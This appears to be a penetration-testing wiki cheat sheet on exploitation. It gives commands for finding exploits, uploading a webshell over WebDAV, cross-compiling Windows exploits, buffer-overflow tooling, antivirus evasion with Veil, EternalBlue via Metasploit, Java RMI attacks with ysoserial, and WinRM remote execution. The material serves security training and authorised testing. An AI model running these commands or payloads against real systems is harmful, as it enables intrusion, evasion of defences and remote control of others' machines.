Intro to exploitation

Penetration Testing Wiki

How to find exploits

In Kali Linux:

searchsploit <SERVICE NAME>

Google:

site:exploit-db.com APP VERSION
linux-exploit-suggester.sh -k 2.6.9
windows-exploit-suggester.py -i <systeminfo file>
linuxprivchecker.py

NULL session

net use \\$IP\ipc$ "" "/user:"

WebDAV

cadaver http://$IP
dav:/> put webshell.aspx

Compilers

To crosscompile windows exploits in linux:

First install the package:

apt-get install mingw-w64

Command line for C:

i686-w64-mingw32-gcc -lws2_32 -o 100 100.c

Useful flags:

gcc -l ws2_32 -l mswsock

Command line for C++:

i686-mingw32-g++ main.cpp -o main -static

To obfuscate a python or bat script:

Reversing in Linux

Tools:

radare2

Useful commands for radare2:

is: Show symbols
iS: Show sections
ii: Show imports
iI: Binary info
ia: Show all info
i?: All commands starting with i

egg-hunter

/usr/share/metasploit-framework/tools/exploit/egghunter.rb -f python -e W00T

Buffer Overflow offsets:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 256
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 256 -q 773870B4

Reversing in Windows

Tools:

  • IDA Pro
  • OllyDbg
  • Immunity Debugger
  • https://github.com/corelan/mona Corelan Repository for mona.py
  • http://www.rohitab.com/apimonitor API Monitor is a free software that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications

Reversing .NET

Fuzzing

Linux

  • sfuzz (kali)
  • radamsa
  • spike

Windows

AFL is a popular fuzzing tool for coverage-guided fuzzing. The tool combines fast target execution with clever heuristics to find new execution paths in the target binary. It has been successfully used to find a large number of vulnerabilities in real products.

AV Evasion

  • Veil: Encrypts/Encode/Obfuscate msfvenom-like payloads

Thanks https://twitter.com/ReneFreingruber/status/1031140505453842432 @ReneFreingruber

To remove ”/var/lib/veil” strings and make reverse engineering harder:

-gcflags=-trimpath=/var/lib/veil -asmflags=-trimpath=/var/lib/veil

Other tools:

SMB exploitation

Eternalblue (Target: Windows 7 and Server 2008 R2 (x64) All Service Packs):

use exploit/windows/smb/ms17_010_eternalblue
nmap -sS -T4 --open -p 139,445 --script=smb-vuln-conficker,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos --script-args=unsafe=1 $IP/24

References:

Java RMI exploitation

Nmap will recognize it as:

XXXX/tcp  open  rmiregistry       Java RMI

Exploiting RMI

With nmap:

nmap --script=rmi-vuln-classloader -p 1099 $IP
nmap --script=rmi-dumpregistry -p 1099 $IP

With metasploit:

use exploit/multi/misc/java_rmi_server

With ysoserial:

java -cp ysoserial.jar ysoserial.RMIRegistryExploit $IP 1098 CommonsCollections1 calc.exe

With java monitoring and performance console (OS performance and application parameters):

jconsole

WinRM exploitation

Commands:

winrs -r:$HOST $CMD
Test-WSMan -ComputerName $HOST

More info about WinRM lateral movement: https://www.hackingarticles.in/winrm-penetration-testing/